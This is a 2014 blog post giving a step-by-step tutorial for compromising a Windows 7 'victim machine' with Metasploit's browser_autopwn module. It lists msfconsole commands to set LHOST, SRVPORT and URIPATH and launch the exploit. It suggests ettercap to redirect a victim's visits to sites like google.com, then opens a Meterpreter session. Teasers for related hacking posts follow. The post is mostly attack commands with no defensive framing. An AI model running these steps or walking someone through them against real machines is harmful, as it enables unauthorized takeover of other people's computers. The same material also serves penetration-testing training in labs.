Tuesday, 29 July 2014

exploiting windows7 using kali linux

How to Hack Windows 7  Using Metasploit In Kali Linux Tutorial


1). Start Backtrack
2). Type "Startx" To enter GUI mode of Backtrack.
3). Go To terminal
4). Type "msfconsole"

In Victim Machine
1). Start the victim Machine

Back to Backtrack
5). Type msf:>use auxiliary/server/browser_autopwn

[center][Image: 11653182.png][/center]

6). Thentype msf :>show Options Set LHOST means Localhost ip address To checkLocalhost ip Go to terminal And type "ifconfig"

7). msf:>set LHOST eg.192.168.168.1 After That you want set SRVPORT which is 80 or 8080

8). msf:>set SRVPORT 80 Then set URIPATH eg.root "/"

9). msf:>set URIPATH /

[center][Image: 11653227.png][/center]
Now Everything Is done

10). msf:>exploit or run

[center][Image: 11653242.png][/center]
Now What to need To to open On victim Machine

Open Any Browser Type Your BAcktrack Machine's ip address eg.<!-- m --><a class="postlink" href="http://192.168.168.1/">http://192.168.168.1/</a><!-- m -->

If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open <!-- m --><a class="postlink" href="http://www.google.com">http://www.google.com</a><!-- m --> it can also hacked.

After A minute you Can see our Session Is open

[center][Image: 11653314.png][/center]
To open a Meterprete

type msf:>sessions -i 1

[center][Image: 11653345.png][/center]

Related Posts:

  • How exactly does the Heartbleed exploit work? The Heartbleed Bug The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing … Read More
  • Nmap Commands Top 30 Nmap Command Examples For Sys/Network Admins Nmap is short for Network Mapper. It is an open source security tool for network exploration, security scanning and auditing. However, nmap command comes with lots of… Read More
  • Malware Can Bypasses Chrome Extension Security Feature Easily Researchers have uncovered a new social engineering trick that leads users to a malicious extension from Google Chrome impersonating to deliver Adobe’s Flash Player in order to lure victims in a click fraud campa… Read More
  • Introduction To Armitage in Kali Introduction To Armitage in Kali Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits … Read More
  • Hack Windows 8 Java vulnerability Java signed applet Hack Windows 8 Java vulnerability In this tutorial we will look at how difficult it can be to hack modern operating systems.  Hack any Window… Read More

0 comments:

Post a Comment